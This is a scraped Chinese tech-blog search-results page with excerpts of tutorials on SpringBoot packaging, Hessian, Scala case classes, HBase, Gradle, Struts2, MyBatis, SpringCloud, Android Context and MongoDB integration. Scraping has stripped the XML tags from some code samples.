前端技术
HTML
CSS
Javascript
前端框架和UI库
VUE
ReactJS
AngularJS
JQuery
NodeJS
JSON
Element-UI
Bootstrap
Material UI
服务端和客户端
Java
Python
PHP
Golang
Scala
Kotlin
Groovy
Ruby
Lua
.net
c#
c++
后端WEB和工程框架
SpringBoot
SpringCloud
Struts2
MyBatis
Hibernate
Tornado
Beego
Go-Spring
Go Gin
Go Iris
Dubbo
HessianRPC
Maven
Gradle
数据库
MySQL
Oracle
Mongo
中间件与web容器
Redis
MemCache
Etcd
Cassandra
Kafka
RabbitMQ
RocketMQ
ActiveMQ
Nacos
Consul
Tomcat
Nginx
Netty
大数据技术
Hive
Impala
ClickHouse
DorisDB
Greenplum
PostgreSQL
HBase
Kylin
Hadoop
Apache Pig
ZooKeeper
SeaTunnel
Sqoop
Datax
Flink
Spark
Mahout
数据搜索与日志
ElasticSearch
Apache Lucene
Apache Solr
Kibana
Logstash
数据可视化与OLAP
Apache Atlas
Superset
Saiku
Tesseract
系统与容器
Linux
Shell
Docker
Kubernetes
[Class文件主版本号与JDK兼容性]的搜索结果
这里是文章列表。热门标签的颜色随机变换,标签颜色没有特殊含义。
点击某个标签可搜索标签相关的文章。
点击某个标签可搜索标签相关的文章。
SpringBoot
...执行的jar或war文件,我们就需要用到Maven进行打包。这一步真的超级关键,它可是直接关系到咱们的应用程序能否在目标环境里头既准确又溜溜地跑起来! 2. 准备工作 配置SpringBoot Maven插件 首先,让我们打开你的pom.xml文件,确保已包含SpringBoot Maven插件的配置。如下所示: xml org.springframework.boot spring-boot-maven-plugin 这个插件是SpringBoot项目的标配,它能帮我们构建可执行的jar(或war)文件,并包含了内嵌的Tomcat服务器等运行环境信息。 3. 打包实战 生成可执行的Jar (1)在IDEA中右键点击项目 -> Maven -> Packages -> Package,或者直接在命令行中执行mvn package命令,Maven将会自动为我们构建项目并生成打包文件。 (2)查看target目录,你应该能看到一个名为your-project-0.0.1-SNAPSHOT.jar的文件,这就是Maven为你生成的可执行jar包。你可以通过java -jar your-project-0.0.1-SNAPSHOT.jar命令启动你的SpringBoot应用。 小贴士: 如果你想定制打包后的jar名字,可以在标签内添加finalName属性: xml customized-name 4. 深入理解 SpringBoot的Fat Jar SpringBoot的打包方式独特之处在于其支持Fat Jar(胖 jar)。这就意味着所有的相关小帮手(依赖库)都会被塞进同一个“大包裹”(jar文件)里,这样一来,应用程序就能自个儿独立跑起来,完全不需要你再额外费心去设置什么类路径了。这是通过SpringBoot Maven插件实现的。 xml ZIP 5. 遇到的问题与解决方案 5.1 Main-Class找不到? 有时候,即使你按照上述步骤打包了,但在运行jar时可能会遇到"Could not find or load main class"的问题。这是因为Maven没有正确识别到主类。 解决办法是在pom.xml中显式指定主类: xml org.springframework.boot spring-boot-maven-plugin com.yourcompany.yourproject.YourMainApplicationClass 5.2 运行时依赖缺失? 如果你发现有些依赖在运行时无法加载,检查一下是否将它们声明为了provided或test范围。这两种类型的依赖在打包时不会被包含进来。你需要根据实际情况调整依赖范围。 好了,以上就是在IDEA中使用Maven对SpringBoot项目进行打包的一些基本操作和常见问题处理。希望这篇文章能帮你解决实际开发中的疑惑,也欢迎你在打包过程中产生更多的思考和探索。毕竟,编程的魅力就在于不断尝试、不断解决问题的过程,不是吗?让我们一起在Java世界里愉快地“打包旅行”吧!
2023-02-09 19:33:58
67
飞鸟与鱼_
HessianRPC
...示例 public class Server { public MyObject serve() { return new MyObject("Some Value"); } } // 客户端通过HessianProxyFactory创建代理对象进行远程调用 HessianProxyFactory factory = new HessianProxyFactory(); MyService service = (MyService) factory.create(MyService.class, "http://localhost:8080/myService"); MyObject obj = service.serve(); 2.2 序列化与反序列化过程中的空引用问题 当对象中包含null值属性时,Hessian可以正常处理并将其序列化为二进制数据。在反序列化这个环节,假如服务器那边传回来的对象里,某个属性值是空的(null),然后客户端这边呢,拿到这个属性后,不管三七二十一就直接进行非空判断或者动手操作了,这时候,“啪”一下,NullPointerException就会冒出来啦。 java // 假设服务端返回的对象包含可能为null的字段 public class MyObject { private String value; // 构造函数省略... public String getValue() { return value; } } // 客户端直接访问可能为null的字段 String receivedValue = service.serve().getValue(); // 可能抛出NullPointerException 3. 深入剖析NullPointerException的原因 出现上述异常的根本原因在于,我们在设计和使用对象时,没有对可为空的成员变量做充分的防御性编程。拿到反序列化出来的对象,你要是不检查一下引用是否为空就直接动手操作,这就跟走钢丝还不看脚下似的。万一不小心一脚踩空了,那程序可就得立马“扑街”了。 4. 针对HessianRPC中NullPointerException的防范措施 4.1 空值检查 在客户端使用反序列化后的对象时,务必对每个可能为null的引用进行检查: java MyObject obj = service.serve(); if (obj != null && obj.getValue() != null) { // 安全操作 } 4.2 使用Optional类包装可能为null的值 Java 8引入了Optional类,它可以优雅地表达和处理可能存在的空值: java Optional optionalValue = Optional.ofNullable(service.serve().getValue()); optionalValue.ifPresent(value -> System.out.println(value)); 4.3 设计合理的业务逻辑与数据模型 从源头上避免产生空引用,例如在服务端确保返回的对象其关键字段不为null,或者提供默认值。 5. 结论 尽管HessianRPC以其高效便捷著称,但在使用过程中,我们仍需关注并妥善处理可能出现的NullPointerException问题。只有深入理解序列化和反序列化的机制,并结合良好的编程习惯,才能在享受技术便利的同时,确保系统的健壮性和稳定性。记住了啊,每一次我们认真对付那些空引用的时候,其实就是在给系统的质量添砖加瓦呢,同时这也是咱作为开发者不断琢磨、持续优化的过程,可重要了!
2023-08-11 10:48:19
481
素颜如水
Scala
...ala中的Case Classes 首先,让我们揭开Scala case类的神秘面纱。在Scala中,case类是一种特殊的类,它主要用于模式匹配以及作为枚举类型的替代品。相比普通类,case类有以下特点: - 自动生成equals、hashCode和toString方法 - 提供伴生对象,包含一个apply方法(可以进行工厂方法式创建实例) - 所有字段默认为val(不可变) scala // 普通类定义 class Person(val name: String, val age: Int) // Case类定义 case class Person(name: String, age: Int) 上述代码中,我们定义了一个Person类,当我们将其改为case类后,无需手动覆盖equals、hashCode等方法,并且可以直接通过Person("Alice", 30)的方式快速创建实例。 2. 使用Case Classes进行模式匹配 Scala中的case类在模式匹配中大放异彩。看下面这个示例: scala sealed trait Message case class TextMessage(text: String) extends Message case class ImageMessage(url: String) extends Message def handleMessage(msg: Message): Unit = msg match { case TextMessage(text) => println(s"Received text message: $text") case ImageMessage(url) => println(s"Received image message from url: $url") } handleMessage(TextMessage("Hello!")) 在上述代码中,我们定义了一个sealed trait Message及两个继承自它的case类TextMessage和ImageMessage。在处理各种消息的时候,我们可以像玩拼图那样,通过模式匹配的方式对不同类型的Message进行针对性的处理。这样做,就像给代码施了个神奇的小魔法,让它变得更易读、更好理解,同时也让维护起来更加轻松愉快,省时省力。 3. Case Classes在集合操作中的应用 由于case类提供了便利的equals和hashCode方法,因此它们在集合操作中也非常有用。例如,在groupingBy操作中,case类可以自然地作为键值: scala case class User(id: Int, name: String) val users = List(User(1, "Alice"), User(2, "Bob"), User(1, "Charlie")) val userGroupsById = users.groupBy(_.id) println(userGroupsById) // Map(1 -> List(User(1,Alice), User(1,Charlie)), 2 -> List(User(2,Bob))) 这段代码中,我们利用case类User的id属性对用户列表进行了分组,由于case类提供的便捷方法,我们无需额外编写比较逻辑。 4. 结论 让代码更加简练与优雅 总的来说,Scala的case类为我们提供了一种既能保证数据封装又能简化代码结构的有效方式。在模式匹配、替代枚举、操作集合这些方面,它们可是大显身手,让我们的代码变得更加言简意赅,读起来更轻松易懂,维护起来也更加省心省力。当你在敲代码,特别是遇到要处理特定的数据结构或者参与模式匹配这种棘手问题时,不妨试试看用case类这个小技巧。信我,一旦你用了它,那你的代码就像被施了魔法一样,瞬间从乱麻变成简洁又优美的艺术品,感觉就像是精心打磨过的杰作一样。这就是Scala的魅力所在,也是我们不断探索和实践的动力源泉。
2024-01-24 08:54:25
69
柳暗花明又一村
HBase
...y(Request.class))).thenThrow(new IOException("Network error")); 3. 数据一致性问题 HBase采用基于时间戳的强一致性模型,当多个节点同时修改相同的数据时,如果没有正确的协调机制,可能会导致数据不一致。 java //模拟并发写入导致的数据冲突 ConcurrentModificationException exception = new ConcurrentModificationException("Data conflict"); doThrow(exception).when(store).put(eq(row), eq(values)); 4. 配置错误 配置错误是常见的问题,如未正确设置参数,或者误删了重要的配置文件等,都可能导致HBase服务中断。 java //删除配置文件 File file = new File("/path/to/config/file"); if (file.exists()) { file.delete(); } 三、HBase服务异常中断解决方案 针对上述的HBase服务异常中断原因,可以采取以下几种解决方案: 1. 提升硬件资源 增加内存、CPU、硬盘等硬件资源,确保HBase能够有足够的资源来运行。 2. 解决网络问题 优化网络环境,提高网络带宽和稳定性,减少丢包和延迟。 3. 强化数据一致性管理 引入事务机制,确保数据的一致性。比如,我们可以利用HBase的MVCC(多版本并发控制)技术,或者请Zookeeper这位大管家帮忙,协调各个节点间的数据同步工作。就像是在一群小伙伴中,有人负责记录不同版本的信息,有人负责确保大家手里的数据都是最新最准确的那样。 4. 检查并修复配置错误 定期检查和维护配置文件,避免因配置错误而导致的服务中断。 以上就是对HBase服务异常中断的一些分析和解决方案。在实际操作的时候,咱们还要看具体情况、瞅准真实需求,像变戏法一样灵活挑拣并运用这些方法。
2023-07-01 22:51:34
558
雪域高原-t
Gradle
...ld.gradle文件中,我们使用dependencies块来声明项目所需的各种依赖。例如: groovy dependencies { implementation 'com.google.guava:guava:29.0-jre' // 声明对Guava库的依赖 testImplementation 'junit:junit:4.13' // 在测试代码中使用的JUnit依赖 } 这里的implementation和testImplementation是配置名称,它们分别表示主源码编译依赖与测试源码编译依赖。后面的字符串则是依赖的具体描述,遵循“groupId:artifactId:version”的格式。 2. 依赖传递性理解与控制 Gradle支持依赖的传递性,这意味着如果你直接依赖的库又依赖了其他库,那么那些间接依赖也会自动被包含进来。不过,在某些情况下,你可能需要控制或排除某些传递性依赖,可以使用exclude关键字实现: groovy dependencies { implementation('org.springframework.boot:spring-boot-starter-data-jpa') { exclude group: 'org.hibernate', module: 'hibernate-entitymanager' } } 上述代码表示我们在引入Spring Boot Data JPA starter时,明确排除了Hibernate Entity Manager。 3. 打包时确保依赖包含无遗漏 当执行Gradle的jar任务(或Android的assemble任务)打包项目时,Gradle会自动处理所有已声明的依赖关系。一般来说,如果没啥特殊设定,那些直接用到的依赖关系会自动被塞进类路径里。而那些间接、传递过来的依赖关系,是否会被纳入其中,就得看具体的配置策略怎么安排了。 但是请注意,Gradle并不会将依赖库的.jar文件物理地打包进你的主.jar文件中,而是会在生成的.jar文件的META-INF/MANIFEST.MF文件中记录依赖信息,以供运行时解析。如果你想创建一个包含所有依赖的“fat jar”(或称为"uber jar"),可以使用如shadow插件或原生的bootJar任务(针对Spring Boot项目): groovy plugins { id 'com.github.johnrengelman.shadow' version '6.1.0' } jar { manifest { attributes 'Main-Class': 'com.example.Main' } } task shadowJar(type: ShadowJar) { archiveBaseName = 'my-app' archiveClassifier = 'all' mergeServiceFiles() } 以上代码片段展示了如何应用Shadow插件并创建一个包含所有依赖的自包含.jar文件。 总结起来,要确保Gradle打包时正确包含依赖包,关键在于合理地在build.gradle中声明和管理依赖,并根据实际需求选择合适的打包策略。Gradle这个家伙的设计理念啊,就是让构建项目这件事儿变得瞅一眼就明白,摸一下就能灵活运用,甭管多复杂的依赖关系网,都能轻松玩转。这样一来,咱们就能麻溜地把项目打包工作给搞定了,高效又省心!在你亲自上手捣鼓和尝试Gradle的过程中,你会发现这玩意儿的强大程度绝对超乎你的想象,它会像个给力的小助手一样,陪你一起砍断开发道路上的各种难题荆棘,勇往直前地一路狂奔。
2023-10-25 18:00:26
454
月影清风_
HBase
...ger(Table.class.getName()).setLevel(Level.INFO); 四、总结 总的来说,HBase的安全性设置是一项非常复杂的工作。但是,只要我们灵活应对实际情况,像拼装乐高那样合理配置资源,就完全能够给咱们的数据安全筑起一道坚实的防护墙。希望这篇简短的文章能帮助你更好地理解和处理这个问题。 五、结语 最后,我想说,无论你的技术水平如何,都不能忽视安全性这个重要的问题。因为,只有保证了安全,才能真正地享受技术带来的便利。真心希望每一位正在使用HBase的大侠,都能把这个问题重视起来,就像保护自家珍宝一样,想出并采取一些实实在在的措施,确保你们的数据安全无虞。
2023-11-16 22:13:40
483
林中小径-t
Apache Pig
...-site.xml文件中的相关配置,如yarn.resourcemanager.scheduler.class和yarn.scheduler.capacity.root.queues等属性,确保目标队列已被正确创建并启用。 4.2 确认权限问题 其次,检查提交作业的用户是否有权访问指定队列。在容量调度器这个系统里,每个队列都有一份专属的“通行证名单”——也就是ACL(访问控制列表)。为了保险起见,得确认一下您是不是已经在这份名单上,拥有对当前队列的访问权限。 4.3 正确指定队列名 在提交Pig作业时,请务必准确无误地指定队列名。例如,如果你在YARN中有名为"data_processing"的队列,应如此提交作业: shell pig -x mapreduce -param yarn_queue_name=data_processing script.pig 4.4 调整资源请求 最后,根据队列的实际资源配置情况,适当调整作业的资源请求(如vCores、内存等)。如果资源请求开得太大,即使队列里明明有资源并且存货充足,作业也可能抓不到自己需要的那份资源,导致无法顺利完成任务。 5. 总结与思考 理解并解决Pig作业在YARN上无法获取队列资源的问题,不仅需要我们熟悉Apache Pig和YARN的工作原理,更要求我们在实践中细心观察、细致排查。当你碰到这类问题的时候,不妨先从最基础的设置开始“摸底”,一步步地往里探索。同时,得保持像猫捉老鼠那样的敏锐眼神和逮住问题不放的耐心,这样你才能在海量数据这座大山中稳稳当当地向前迈进。毕竟,就像生活一样,处理大数据问题的过程也是充满挑战与乐趣的探索之旅。
2023-06-29 10:55:56
473
半夏微凉
Struts2
...e action, Class com.example.MyAction——深入解析Struts2框架中的问题与解决方案 1. 引言 在使用Apache Struts2进行Java Web开发时,我们可能会遇到一个常见的运行时错误:“Unable to instantiate action, Class com.example.MyAction”。这个错误提示是在告诉我们,Struts2框架在尝试创建指定的Action类时遇到了点状况。就像这次,它正努力生成一个名叫com.example.MyAction的家伙,结果却不那么顺利。这不仅影响到我们的业务逻辑执行,也阻碍了页面跳转等一系列交互过程。这篇东西,咱们会手把手地通过实实在在的代码实例,一起抽丝剥茧,探究这个问题背后的真相,同时还会给你献上一些实用的解决妙招。 2. 问题剖析 情景还原 假设你正在使用Struts2构建一个用户登录功能,并定义了一个处理登录请求的Action类MyAction: java package com.example; public class MyAction extends ActionSupport { private String username; private String password; // Getter and Setter methods for username and password... @Override public String execute() throws Exception { // Your login logic here... return "success"; } } 然后在struts.xml配置文件中映射该Action: xml /success.jsp 当用户发起登录请求访问login.action时,如果出现“Unable to instantiate action”错误,意味着Struts2在尝试创建MyAction实例时出现了异常。 3. 原因分析 导致此类错误的原因可能有以下几点: - Action类未正确编译或部署:确保你的Action类已经被成功编译并且包含在WEB-INF/classes目录下,或者被正确的打包到WAR文件中。 - Action类没有默认构造函数:Struts2通过反射机制来创建Action对象,所以必须存在无参数的构造函数。 java // 正确示例 - 提供默认构造函数 public class MyAction extends ActionSupport { public MyAction() { // ... } // 其他代码... } - 依赖注入问题:如果你在Action类中使用了@Autowired等注解进行依赖注入,但在Spring容器还未完全初始化时就尝试实例化Action,也可能引发此问题。 - 类路径问题:检查你的类路径设置是否正确,确保Struts2能找到并加载对应的Action类。 4. 解决方案 针对上述原因,我们可以采取如下措施: (1) 检查编译和部署情况 确保你的Java源码已成功编译并部署到正确的目录结构中。 (2) 添加默认构造函数 无论你的Action类是否有自定义构造函数,都应添加一个默认构造函数以满足Struts2的实例化需求。 (3) 确保依赖注入顺序 如果是Spring与Struts2整合的问题,需要调整配置以保证Spring容器在Struts2开始实例化Action之前完成初始化。 (4) 核对类路径 确认web应用的类路径设置正确无误,确保能够找到并加载到com.example.MyAction类。 5. 总结与探讨 遇到“Unable to instantiate action”这类错误时,切勿慌乱,它通常是由于一些基础设置或编码规范问题所引起的。作为一个开发者,在我们每天敲代码的过程中,真的得对这些问题上点心,就像侦探破案一样,得仔仔细细地排查、调试。这样咱们才能真正摸清Struts2框架是怎么工作的,把它玩转起来,以后类似的错误才不会找上门来。同时呢,不断回顾、归纳总结这些经验教训,并且乐于分享给大伙儿,这对我们个人技术能力的提升,以及整个团队协作效率的提高,那可是大有裨益,可以说帮助不要太大!让我们携手共进,在实践中深化对Struts2框架的理解,共同面对并解决各种技术挑战!
2023-04-28 14:54:56
67
寂静森林
Sqoop
...op生态系统中的各种文件系统(例如HDFS)。不过,当我们面对海量数据时,可能免不了会遇到一些头疼的小状况,比如错误信息老是不靠谱,日志记录多到让人眼花缭乱啥的。这些问题会影响我们的工作效率。因此,本文将介绍如何优化Sqoop的日志记录,从而提高我们的调试效率。 二、为何需要优化Sqoop的日志记录? 首先,我们需要了解为什么需要优化Sqoop的日志记录。日志记录是软件开发中非常重要的一部分,它可以帮助我们追踪程序运行过程中的各种细节,包括错误信息、警告信息、重要事件等。在使用Sqoop的过程中,如果日志记录不当,可能会导致以下问题: 1. 错误信息不准确 由于日志记录的不足,可能导致错误信息不够详细,甚至无法定位到具体的错误原因。 2. 日志记录过多 过多的日志记录不仅会占用大量的存储空间,而且也会增加系统的负担,影响性能。 3. 无法追踪程序运行过程 如果日志记录过于简单,可能无法追踪程序运行的具体过程,从而难以进行有效的调试。 三、如何优化Sqoop的日志记录? 针对以上问题,我们可以采取以下几种方法来优化Sqoop的日志记录: 1. 增加详细的错误信息 为了使错误信息更准确,我们可以在 Sqoop 的源代码中添加更多的异常捕获和错误处理代码。这样,咱们就能更轻松地揪出问题的根源啦,然后根据这些线索对症下药,手到病除。 下面是一段示例代码: java try { // 执行操作 } catch (Exception e) { // 记录异常信息 logger.error("Failed to execute operation", e); } 2. 减少不必要的日志记录 为了减少日志记录的数量,我们可以删除那些不必要的日志语句。这样不仅可以节省存储空间,还可以提高系统的运行速度。 下面是一段示例代码: java // 如果你确定这个操作一定会成功,那么就可以省略这个日志语句 //logger.info("Successfully executed operation"); 3. 使用日志级别控制日志输出 在 Sqoop 中,我们可以使用不同的日志级别(如 debug、info、warn、error 等)来控制日志的输出。这样一来,我们就能灵活地根据自身需求,像逛超市挑选商品那样,有选择性地查看日志信息,而不是被迫接收所有那些可能无关紧要的日志消息。 下面是一段示例代码: java // 设置日志级别为 info,这意味着只会在出现信息级别的日志消息时才会打印出来 Logger.getLogger(Sqoop.class.getName()).setLevel(Level.INFO); 四、总结 总的来说,优化 Sqoop 的日志记录可以帮助我们更好地调试程序,提高我们的工作效率。你知道吗,为了让 Sqoop 的日志记录更好使、更易懂,咱们可以采取这么几个招儿。首先,给错误信息多添点儿细节,让它说得明明白白,这样找问题时就一目了然了。其次,别啥都记,只把真正重要的内容写进日志里,减少那些不必要的“口水话”。最后,灵活运用日志级别调整输出内容,就像调节音量一样,需要详尽的时候调高点,日常运维时调低调静。这样一来,咱们就能更顺手地管理和解读 Sqoop 的日志啦。
2023-04-25 10:55:46
75
冬日暖阳-t
MyBatis
...va public class User { private String id; private String name; // getters and setters @Override public String toString() { return new Gson().toJson(this); } } 然后在 MyBatis 的 XML 映射文件中使用 语句,并设置其 resultType 为 String 类型,配合 toString() 方法即可得到 JSON 数据:xml SELECT FROM user WHERE id = {id} 通过这种方式,MyBatis 会调用用户自定义的 toString() 方法生成对应的 JSON 字符串。 2. 自定义类型处理器(TypeHandler) 然而,如果我们想要更灵活地控制数据转换过程,或者映射包含嵌套的对象结构,可以考虑自定义类型处理器。这里以 Jackson 为例,创建一个继承自 org.apache.ibatis.type.TypeHandler 的 UserToJsonTypeHandler 类: java import com.fasterxml.jackson.databind.ObjectMapper; import org.apache.ibatis.type.BaseTypeHandler; import org.apache.ibatis.type.JdbcType; import org.apache.ibatis.type.MappedTypes; @MappedTypes(User.class) public class UserToJsonTypeHandler extends BaseTypeHandler { private static final ObjectMapper OBJECT_MAPPER = new ObjectMapper(); @Override public void setNonNullParameter(PreparedStatement ps, int i, User parameter, JdbcType jdbcType) throws SQLException { ps.setString(i, OBJECT_MAPPER.writeValueAsString(parameter)); } @Override public User getNullableResult(ResultSet rs, String columnName) throws SQLException { String jsonString = rs.getString(columnName); return OBJECT_MAPPER.readValue(jsonString, User.class); } @Override public User getNullableResult(ResultSet rs, int columnIndex) throws SQLException { // ... (类似地处理其他获取方式) } @Override public User getNullableResult(CallableStatement cs, int columnIndex) throws SQLException { // ... (类似地处理其他获取方式) } } 在配置文件中注册这个自定义类型处理器: xml INSERT INTO user (json_data) VALUES (?) SELECT json_data FROM user WHERE id = {id} 现在,User 对象可以直接插入和查询为 JSON 字符串形式,而不需要手动调用 toString() 方法。 四、总结与讨论 通过本篇文章的学习,我们可以了解到 MyBatis 在默认情况下并不直接支持实体类与 JSON 数据的自动转换。不过,要是我们借助一些好用的第三方JSON工具,比如Jackson或者Gson,再配上自定义的类型处理器,就能超级灵活、高效地搞定这种复杂的数据映射难题啦,就像变魔术一样神奇!在我们实际做开发的时候,就得瞅准业务需求,挑那个最对味的解决方案来用。而且啊,你可别忘了把 MyBatis 的其他功能也玩得溜溜转,这样一来,你的应用性能就能噌噌往上涨,开发效率也能像火箭升空一样蹭蹭提升。同时呢,掌握并实际运用这些小技巧,也能让你在面对其他各种复杂场景下的数据处理难题时,更加游刃有余,轻松应对。
2024-02-19 11:00:31
75
海阔天空-t
SpringCloud
...功能 public class ProviderApplication { public static void main(String[] args) { SpringApplication.run(ProviderApplication.class, args); } @Bean @LoadBalanced // 负载均衡注解,这里假设省略了,可能导致服务未正确注册 public RestTemplate restTemplate() { return new RestTemplate(); } } 在此示例中,若忘记添加@LoadBalanced注解,可能导致服务提供者虽然启动,但并未能成功注册到服务中心。 2.2 服务版本不匹配 思考过程: 服务提供者可能发布了新版本的服务,而消费者仍然使用旧版服务名进行调用。 yaml 消费者配置文件 spring: application: name: consumer-service cloud: nacos: discovery: server-addr: localhost:8848 注册中心地址 service: consumer-service: version: 1.0.0 若此处版本与提供者不一致,将导致无法匹配 2.3 服务实例状态异常 理解过程: 服务中心中的服务提供者实例可能因为网络、负载等问题处于下线或隔离状态,此时消费者也无法正常调用。 2.4 配置问题 探讨性话术: 检查消费者的依赖注入和服务引用是否正确,例如Feign、RestTemplate或OpenFeign的配置和使用: java @FeignClient(name = "provider-service", url = "${feign.client.provider.url}") public interface ProviderService { @GetMapping("/api") String callApi(); } 如果name值与提供者应用名称不匹配,或者url配置有误,也可能导致服务匹配异常。 3. 解决方案与防范措施 针对上述原因,我们可以采取以下措施: 1. 确保服务提供者的注册与发现功能启用且配置无误。 2. 在发布新版本服务时,同步更新消费者对服务版本的引用。 3. 定期监控服务中心,确保服务实例健康在线,及时处理异常实例。 4. 仔细检查并校验消费者服务引用的相关配置。 总结来说,面对SpringCloud环境下服务提供者与消费者无法匹配的异常问题,我们需要结合具体场景,深究背后的原因,通过对症下药的方式逐一排查并解决问题。同时呢,咱们也得时刻惦记着对微服务架构整体格局的把握,还有对其背后隐藏的那些玄机的深刻理解,这样一来,才能更好地对付未来可能出现的各种技术难题,就像是个身经百战的老兵一样。
2023-02-03 17:24:44
128
春暖花开
HessianRPC
...") public class HelloServiceImpl implements HelloService { @Override public String sayHello(String name) { return "Hello, " + name; } } // 客户端调用示例 HessianProxyFactory factory = new HessianProxyFactory(); HelloService service = (HelloService) factory.create(HelloService.class, "http://localhost:8080/hello"); String greeting = service.sayHello("World"); 3. HessianURLException详解 当我们在使用HessianRPC进行远程调用时,如果出现"HessianURLException: 创建或处理URL时发生错误。"异常,这通常意味着在创建或解析目标服务的URL地址时出现了问题。比如URL格式不正确、网络不可达或者其他相关的I/O异常。 java try { // 错误的URL格式导致HessianURLException HelloService wrongService = (HelloService) factory.create(HelloService.class, "localhost:8080/hello"); } catch (MalformedURLException e) { System.out.println("HessianURLException: 创建或处理URL时发生错误。"); // 抛出异常 } 在这个例子中,由于我们没有提供完整的URL(缺少协议部分"http://"),所以HessianRPC无法正确解析并创建到服务端的连接,从而抛出了HessianURLException。 4. 解决方案与预防措施 面对HessianURLException,我们需要从以下几个方面着手解决问题: 4.1 检查URL格式 确保提供的URL是完整且有效的,包括协议(如"http://"或"https://")、主机名、端口号及资源路径等必要组成部分。 java // 正确的URL格式 HelloService correctService = (HelloService) factory.create(HelloService.class, "http://localhost:8080/hello"); 4.2 确保网络可达性 检查客户端和服务端之间的网络连接是否畅通无阻。如果服务端未启动或者防火墙阻止了连接请求,也可能引发此异常。 4.3 异常捕获与处理 在代码中合理地处理此类异常,给用户提供明确的错误信息提示。 java try { HelloService service = (HelloService) factory.create(HelloService.class, "http://localhost:8080/hello"); } catch (HessianConnectionException | MalformedURLException e) { System.err.println("无法连接到远程服务,请检查URL和网络状况:" + e.getMessage()); } 5. 总结 在我们的编程旅程中,理解并妥善处理像"HessianURLException: 创建或处理URL时发生错误"这样的异常,有助于提升系统的稳定性和健壮性。对于HessianRPC来说,每一个细节都可能影响到远程调用的成功与否。所以呢,真要解决这类问题,归根结底就俩大法宝:一个是牢牢掌握的基础知识,那叫一个扎实;另一个就是严谨到家的编码习惯了,这两样可真是缺一不可的关键所在啊!伙计们,让我们一起瞪大眼睛,鼓起勇气,把HessianRPC变成我们手里的神兵利器,让它在开发分布式应用时,帮我们飞速提升效率,让开发过程更轻松、更给力!
2023-10-16 10:44:02
531
柳暗花明又一村
转载文章
... abstract class whose implementation is provided by the Android system. It allows access to application-specific resources and classes, as well as up-cal for application-level operations such as launching activities, broadcasting and receiving intents, etc 从上的描述可以知道context和一下三点作用: 它描述的是一个应用程序的环境,即上下文 它类是一个抽象的类,android提供了一个具体的通用实现类contextIml类。 它就像是一个大管家,是一个访问全局信息的接口。通过它我们可以获取应用程度 的资源的类,包括一些应用级的操作,如启动一个activity,发送广播,接受Intent信息。 7.context家族的关系 8.android context源码简析 8.1Context.java:抽象类,提供了一组通用的API public abstract class Context { ... public abstract Object getSystemService(String name); //获得系统级服务 public abstract void startActivity(Intent intent); //通过一个Intent启动Activity public abstract ComponentName startService(Intent service); //启动Service //根据文件名得到SharedPreferences对象 public abstract SharedPreferences getSharedPreferences(String name,int mode); ... } 8.2 Contextlml.java:Context和实现类,但函数的大部分功能都是直接调用其属性的mPackageInfo去完成 / Common implementation of Context API, which provides the base context object for Activity and other application components. / class ContextImpl extends Context{ //所有Application程序公用一个mPackageInfo对象 /package/ ActivityThread.PackageInfo mPackageInfo; @Override public Object getSystemService(String name){ ... else if (ACTIVITY_SERVICE.equals(name)) { return getActivityManager(); } else if (INPUT_METHOD_SERVICE.equals(name)) { return InputMethodManager.getInstance(this); } } @Override public void startActivity(Intent intent) { ... //开始启动一个Activity mMainThread.getInstrumentation().execStartActivity( getOuterContext(), mMainThread.getApplicationThread(), null, null, intent, -1); } } 8.3 ContextWrapper.java:该类只是对Context类的一种包装,该类的构造函数包含了一个真正的Context引用,即ContextIml对象。 public class ContextWrapper extends Context { Context mBase; //该属性指向一个ContextIml实例,一般在创建Application、Service、Activity时赋值 //创建Application、Service、Activity,会调用该方法给mBase属性赋值 protected void attachBaseContext(Context base) { if (mBase != null) { throw new IllegalStateException("Base context already set"); } mBase = base; } @Override public void startActivity(Intent intent) { mBase.startActivity(intent); //调用mBase实例方法 } } 8.4ContextThemeWrapper.java:该类内部包含了主题(Theme)相关的接口,即android:theme属性指定的。只有Activity需要主题,Service不需要主题,所以Service直接继承于ContextWrapper类。 public class ContextThemeWrapper extends ContextWrapper { //该属性指向一个ContextIml实例,一般在创建Application、Service、Activity时赋值 private Context mBase; //mBase赋值方式同样有一下两种 public ContextThemeWrapper(Context base, int themeres) { super(base); mBase = base; mThemeResource = themeres; } @Override protected void attachBaseContext(Context newBase) { super.attachBaseContext(newBase); mBase = newBase; } } 9.Activity类 、Service类 、Application类本质上都是Context子类,所以应用程序App共有的Context数目公式为: 总Context实例个数 = Service个数 + Activity个数 + 1(Application对应的Context实例) 10.AR/VR研究的朋友可以加入下面的群或是关注下面的微信公众号 本篇文章为转载内容。原文链接:https://blog.csdn.net/yywan1314520/article/details/51953172。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-09-27 17:37:26
93
转载
SpringBoot
...装Java运行环境。版本上没硬性要求,不过我强烈建议你们选择最新潮的那个——Java 8或者更新更高的版本,这样用起来更溜~然后,我们需要下载并安装SpringBoot和Maven这两个工具。SpringBoot可以为我们提供一个快速构建Web应用的基础框架,而Maven则可以帮助我们管理项目的依赖关系。 3. 创建SpringBoot项目 接下来,我们可以开始创建我们的SpringBoot项目。首先,打开命令行工具,并进入你要存放项目的位置。然后,输入以下命令来创建一个新的SpringBoot项目: bash mvn archetype:generate -DgroupId=com.example -DartifactId=springboot-mongoapp -DarchetypeArtifactId= spring-boot-starter-parent -DinteractiveMode=false 这行命令的意思是使用Maven的archetype功能来生成一个新的SpringBoot项目,该项目的组ID为com.example, artifactID为springboot-mongoapp,父依赖为spring-boot-starter-parent。这个命令会自动为你创建好所有的项目文件和目录结构,包括pom.xml和src/main/java/com/example/springbootmongoapp等文件。 4. 配置SpringBoot和MongoDB 在创建好项目之后,我们需要进行一些配置工作。首先,我们需要在pom.xml文件中添加SpringDataMongoDB的依赖: xml org.springframework.boot spring-boot-starter-data-mongodb 这行代码的意思是我们需要使用SpringDataMongoDB来处理MongoDB的相关操作。然后,我们需要在application.properties文件中添加MongoDB的连接信息: properties spring.data.mongodb.uri=mongodb://localhost:27017/mydb 这行代码的意思是我们的MongoDB服务器位于本地主机的27017端口上,且数据库名为mydb。 5. 使用MongoTemplate操作MongoDB 在配置完成后,我们就可以开始使用MongoTemplate来操作MongoDB了。MongoTemplate是SpringDataMongoDB提供的一个类,它可以帮助我们执行各种数据库操作。下面是一些基本的操作示例: java @Autowired private MongoTemplate mongoTemplate; public void insert(String collectionName, String id, 